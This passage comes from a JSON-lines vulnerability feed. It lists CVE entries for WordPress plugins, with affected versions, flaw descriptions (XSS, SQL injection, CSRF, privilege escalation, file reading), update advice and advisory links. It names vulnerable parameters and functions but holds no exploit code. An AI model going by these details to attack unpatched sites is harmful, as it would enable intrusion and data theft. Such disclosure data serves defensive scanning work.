p#L93\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/click-to-chat-for-whatsapp\\\/tags\\\/3.35\\\/prev\\\/inc\\\/commons\\\/styles.php#L93\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3072112%40click-to-chat-for-whatsapp%2Ftrunk&old=3064395%40click-to-chat-for-whatsapp%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3072112%40click-to-chat-for-whatsapp%2Ftrunk&old=3064395%40click-to-chat-for-whatsapp%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1596","slug":"td-composer","versionEndExcluding":"4.0","description":"The tagDiv Composer WordPress plugin before 4.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cada9be9-522a-4ce8-847d-c8fff2ddcc07\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cada9be9-522a-4ce8-847d-c8fff2ddcc07\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1267","slug":"groundhogg","versionImpact":"3.7.4.1","versionEndExcluding":"4.0","description":"The Groundhogg plugin for Wordpress is vulnerable to Stored Cross-Site Scripting via the \u2018label' parameter in versions up to, and including, 3.7.4.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 4.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/groundhoggwp\\\/groundhogg\\\/commit\\\/5206bf2482e2fe210ccca6e7dcfe62ffe85b3061\",\"name\":\"https:\\\/\\\/github.com\\\/groundhoggwp\\\/groundhogg\\\/commit\\\/5206bf2482e2fe210ccca6e7dcfe62ffe85b3061\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/groundhogg\\\/trunk\\\/assets\\\/js\\\/admin\\\/forms\\\/form-builder-v2.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/groundhogg\\\/trunk\\\/assets\\\/js\\\/admin\\\/forms\\\/form-builder-v2.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/groundhogg\\\/trunk\\\/assets\\\/js\\\/admin\\\/forms\\\/form-builder-v2.js#L859\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/groundhogg\\\/trunk\\\/assets\\\/js\\\/admin\\\/forms\\\/form-builder-v2.js#L859\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3264477\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3264477\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/763a9aff-9bc0-4c79-9383-778a9034b436?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/763a9aff-9bc0-4c79-9383-778a9034b436?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2256","slug":"woocommerce-product-addon","versionEndExcluding":"32.0.7","description":"The Product Addons & Fields for WooCommerce WordPress plugin before 32.0.7 does not sanitize and escape some URL parameters, leading to Reflected Cross-Site Scripting.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1187e041-3be2-4613-8d56-c2394fcc75fb\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1187e041-3be2-4613-8d56-c2394fcc75fb\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1839","slug":"woocommerce-product-addon","versionEndExcluding":"32.0.6","description":"The Product Addons & Fields for WooCommerce WordPress plugin before 32.0.6 does not sanitize and escape some of its setting fields, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example, in multisite setup).","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fddc5a1c-f267-4ef4-8acf-731dbecac450\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fddc5a1c-f267-4ef4-8acf-731dbecac450\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13343","slug":"woocommerce-customers-manager","versionImpact":"31.3","versionEndExcluding":"31.4","description":"The WooCommerce Customers Manager plugin for WordPress is vulnerable to Privilege Escalation due to a missing capability check on the ajax_assign_new_roles() function in all versions up to, and including, 31.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to elevate their privileges to that of an administrator.","recommendation":"Update to version 31.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/woocommerce-customers-manager\\\/10965432\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/woocommerce-customers-manager\\\/10965432\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/193c9fe9-17bc-47e7-b93d-dfcebcf8004d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/193c9fe9-17bc-47e7-b93d-dfcebcf8004d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1747","slug":"woocommerce-customers-manager","versionImpact":"30.1","versionEndExcluding":"30.2","description":"The WooCommerce Customers Manager WordPress plugin before 30.2 does not have authorisation and CSRF in various AJAX actions, allowing any authenticated users, such as subscriber, to call them and update\/delete\/create customer metadata, also leading to Stored Cross-Site Scripting due to the lack of escaping of said metadata values.","recommendation":"Update to version 30.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/17e45d4d-0ee1-4863-a8a4-df8587f448ec\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/17e45d4d-0ee1-4863-a8a4-df8587f448ec\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3983","slug":"woocommerce-customers-manager","versionEndExcluding":"30.1","description":"The WooCommerce Customers Manager WordPress plugin before 30.1 does not have CSRF checks in some bulk actions, which could allow attackers to make logged in admins perform unwanted actions, such as deleting customers via CSRF attacks","recommendation":"Update to version 30.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e4059d66-07b9-4f1a-a461-d6e8f0e98eec\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e4059d66-07b9-4f1a-a461-d6e8f0e98eec\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2843","slug":"woocommerce-customers-manager","versionEndExcluding":"30.1","description":"The WooCommerce Customers Manager WordPress plugin before 30.1 does not have CSRF checks in some places, which could allow attackers to make logged in admin users delete users via CSRF attacks","recommendation":"Update to version 30.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fec4e077-4c4e-4618-bfe8-61fdba59b696\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fec4e077-4c4e-4618-bfe8-61fdba59b696\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-47446","slug":"store-locator","versionEndExcluding":"3.98.8","description":"Cross-Site Request Forgery (CSRF) vulnerability in Viadat Creations Store Locator for WordPress with Google Maps \u2013 LotsOfLocales plugin <=\u00a03.98.7 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/store-locator\\\/wordpress-store-locator-for-wordpress-with-google-maps-lotsoflocales-plugin-3-98-7-cross-site-request-forgery-csrf?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/store-locator\\\/wordpress-store-locator-for-wordpress-with-google-maps-lotsoflocales-plugin-3-98-7-cross-site-request-forgery-csrf?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4849","slug":"wp-automatic","versionImpact":"3.94.0","versionEndExcluding":"3.95.0","description":"The WordPress Automatic Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018autoplay\u2019 parameter in all versions up to, and including, 3.94.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.95.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4be58bfa-d489-45f5-9169-db8bab718175?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4be58bfa-d489-45f5-9169-db8bab718175?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/wordpress-automatic-plugin\\\/1904470\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/wordpress-automatic-plugin\\\/1904470\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1203","slug":"ml-slider","versionImpact":"3.94.0","versionEndExcluding":"3.95.0","description":"The Slider, Gallery, and Carousel by MetaSlider  WordPress plugin before 3.95.0 does not sanitise and escape some of its settings, which could allow high privilege users such as editor to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.95.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fca0b129-3299-46d6-9231-ca5afd2fdb66\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fca0b129-3299-46d6-9231-ca5afd2fdb66\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1062","slug":"ml-slider","versionImpact":"3.94.0","versionEndExcluding":"3.95.0","description":"The Slider, Gallery, and Carousel by MetaSlider  WordPress plugin before 3.95.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.95.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/657b355b-e38f-46d6-b574-7ce736d25f31\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/657b355b-e38f-46d6-b574-7ce736d25f31\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-48294","slug":"fg-drupal-to-wp","versionImpact":"3.90.0","versionEndExcluding":"3.90.1","description":"Server-Side Request Forgery (SSRF) vulnerability in Kerfred FG Drupal to WordPress allows Server Side Request Forgery. This issue affects FG Drupal to WordPress: from n\/a through 3.90.0.","recommendation":"Update to version 3.90.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/fg-drupal-to-wp\\\/vulnerability\\\/wordpress-fg-drupal-to-wordpress-plugin-3-90-0-server-side-request-forgery-ssrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/fg-drupal-to-wp\\\/vulnerability\\\/wordpress-fg-drupal-to-wordpress-plugin-3-90-0-server-side-request-forgery-ssrf-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0959","slug":"eventer","versionImpact":"3.9.9.2","versionEndExcluding":"3.9.9.3","description":"The Eventer - WordPress Event & Booking Manager Plugin plugin for WordPress is vulnerable to SQL Injection via the reg_id parameter in all versions up to, and including, 3.9.9.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 3.9.9.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/eventer-wordpress-event-manager-plugin\\\/20972534\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/eventer-wordpress-event-manager-plugin\\\/20972534\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bd42c89e-57db-458f-910c-404a5615f280?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bd42c89e-57db-458f-910c-404a5615f280?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11134","slug":"eventer","versionImpact":"3.9.9","versionEndExcluding":"3.9.9.1","description":"The Eventer plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'eventer_export_bookings_csv' function in all versions up to, and including, 3.9.9. This makes it possible for authenticated attackers with subscriber-level permissions or above, to download bookings, which contains customers' personal data.","recommendation":"Update to version 3.9.9.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/eventer-wordpress-event-manager-plugin\\\/20972534\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/eventer-wordpress-event-manager-plugin\\\/20972534\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/476bc092-c623-4caf-9676-3036d27c4840?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/476bc092-c623-4caf-9676-3036d27c4840?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3076","slug":"mstore-api","versionEndExcluding":"3.9.9","description":"The MStore API WordPress plugin before 3.9.9 does not prevent visitors from creating user accounts with the role of their choice via their wholesale REST API endpoint. This is only exploitable if the site owner paid to access the plugin's pro features.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ac662436-29d7-4ea6-84e1-f9e229b44f5b\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ac662436-29d7-4ea6-84e1-f9e229b44f5b\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11135","slug":"eventer","versionImpact":"3.9.8","versionEndExcluding":"3.9.9","description":"The Eventer plugin for WordPress is vulnerable to SQL Injection via the 'event' parameter in the 'eventer_get_attendees' function in all versions up to, and including, 3.9.8 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 3.9.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/eventer-wordpress-event-manager-plugin\\\/20972534\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/eventer-wordpress-event-manager-plugin\\\/20972534\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a8dc0712-f78e-46c5-a0d1-2db752498d54?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a8dc0712-f78e-46c5-a0d1-2db752498d54?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4059","slug":"profile-builder","versionEndExcluding":"3.9.8","description":"The Profile Builder WordPress plugin before 3.9.8 lacks authorisation and CSRF in its page creation function which allows unauthenticated users to create the register, log-in and edit-profile pages from the plugin on the blog","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fc719d12-2f58-4d1f-b696-0f937e706842\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fc719d12-2f58-4d1f-b696-0f937e706842\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3077","slug":"mstore-api","versionEndExcluding":"3.9.8","description":"The MStore API WordPress plugin before 3.9.8 does not sanitise and escape a parameter before using it in a SQL statement, leading to a Blind SQL injection exploitable by unauthenticated users. This is only exploitable if the site owner elected to pay to get access to the plugins' pro features, and uses the woocommerce-appointments plugin.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9480d0b5-97da-467d-98f6-71a32599a432\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9480d0b5-97da-467d-98f6-71a32599a432\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10799","slug":"eventer","versionImpact":"3.9.7","versionEndExcluding":"3.9.8","description":"The Eventer plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 3.9.7 via the eventer_woo_download_tickets() function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.","recommendation":"Update to version 3.9.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/eventer-wordpress-event-manager-plugin\\\/20972534\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/eventer-wordpress-event-manager-plugin\\\/20972534\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aea5f970-243f-4642-83e1-34db11c4ca63?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aea5f970-243f-4642-83e1-34db11c4ca63?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3209","slug":"mstore-api","versionEndExcluding":"3.9.7","description":"The MStore API WordPress plugin before 3.9.7 does not secure most of its AJAX actions by implementing privilege checks, nonce checks, or a combination of both.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/970735f1-24bb-441c-89b6-5a0959246d6c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/970735f1-24bb-441c-89b6-5a0959246d6c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3131","slug":"mstore-api","versionEndExcluding":"3.9.7","description":"The MStore API WordPress plugin before 3.9.7 does not secure most of its AJAX actions by implementing privilege checks, nonce checks, or a combination of both.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/970735f1-24bb-441c-89b6-5a0959246d6c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/970735f1-24bb-441c-89b6-5a0959246d6c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3202","slug":"mstore-api","versionEndExcluding":"3.9.7","description":"The MStore API plugin for WordPress is vulnerable to Cross-Site Request Forgery due to missing nonce validation on the mstore_update_firebase_server_key function. This makes it possible for unauthenticated attackers to update the firebase server key to push notification when order status changed via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d2b3612e-3c91-469b-98ef-fdb03b0ee9d9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d2b3612e-3c91-469b-98ef-fdb03b0ee9d9?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2925048%40mstore-api&new=2925048%40mstore-api&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2925048%40mstore-api&new=2925048%40mstore-api&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/trunk\\\/mstore-api.php#L232\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/trunk\\\/mstore-api.php#L232\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3199","slug":"mstore-api","versionEndExcluding":"3.9.7","description":"The MStore API plugin for WordPress is vulnerable to Cross-Site Request Forgery due to missing nonce validation on the mstore_update_status_order_title function. This makes it possible for unauthenticated attackers to update status order title via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2925048%40mstore-api&new=2925048%40mstore-api&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2925048%40mstore-api&new=2925048%40mstore-api&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a604df5d-92b3-4df8-a7ef-00f0ee95cf0f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a604df5d-92b3-4df8-a7ef-00f0ee95cf0f?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/trunk\\\/mstore-api.php#L256\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/trunk\\\/mstore-api.php#L256\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3203","slug":"mstore-api","versionEndExcluding":"3.9.7","description":"The MStore API plugin for WordPress is vulnerable to Cross-Site Request Forgery due to missing nonce validation on the mstore_update_limit_product function. This makes it possible for unauthenticated attackers to update limit the number of product per category to use cache data in home screen via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1aed51a2-9fd4-43bb-b72d-ae8e51ee6e87?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1aed51a2-9fd4-43bb-b72d-ae8e51ee6e87?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2925048%40mstore-api&new=2925048%40mstore-api&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2925048%40mstore-api&new=2925048%40mstore-api&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/trunk\\\/mstore-api.php#L222\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/trunk\\\/mstore-api.php#L222\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3201","slug":"mstore-api","versionEndExcluding":"3.9.7","description":"The MStore API plugin for WordPress is vulnerable to Cross-Site Request Forgery due to missing nonce validation on the mstore_update_new_order_title function. This makes it possible for unauthenticated attackers to update new order title via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2925048%40mstore-api&new=2925048%40mstore-api&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2925048%40mstore-api&new=2925048%40mstore-api&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cb5cb1a5-30d2-434f-90f9-d37aecfbe158?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cb5cb1a5-30d2-434f-90f9-d37aecfbe158?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/trunk\\\/mstore-api.php#L240\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/trunk\\\/mstore-api.php#L240\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3200","slug":"mstore-api","versionEndExcluding":"3.9.7","description":"The MStore API plugin for WordPress is vulnerable to Cross-Site Request Forgery due to missing nonce validation on the mstore_update_new_order_message function. This makes it possible for unauthenticated attackers to update new order message via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/trunk\\\/mstore-api.php#L248\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/trunk\\\/mstore-api.php#L248\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2925048%40mstore-api&new=2925048%40mstore-api&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2925048%40mstore-api&new=2925048%40mstore-api&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78f3c503-e255-44d2-8432-48dc2c5f553d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78f3c503-e255-44d2-8432-48dc2c5f553d?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3198","slug":"mstore-api","versionEndExcluding":"3.9.7","description":"The MStore API plugin for WordPress is vulnerable to Cross-Site Request Forgery due to missing nonce validation on the mstore_update_status_order_message function. This makes it possible for unauthenticated attackers to update status order message via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c5f30190-4576-4c2b-b069-72501538733b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c5f30190-4576-4c2b-b069-72501538733b?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2925048%40mstore-api&new=2925048%40mstore-api&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2925048%40mstore-api&new=2925048%40mstore-api&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/trunk\\\/mstore-api.php#L264\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/trunk\\\/mstore-api.php#L264\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2592","slug":"formcraft-form-builder","versionEndExcluding":"3.9.7","description":"The FormCraft WordPress plugin before 3.9.7 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d4298960-eaba-4185-a730-3e621d9680e1\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d4298960-eaba-4185-a730-3e621d9680e1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
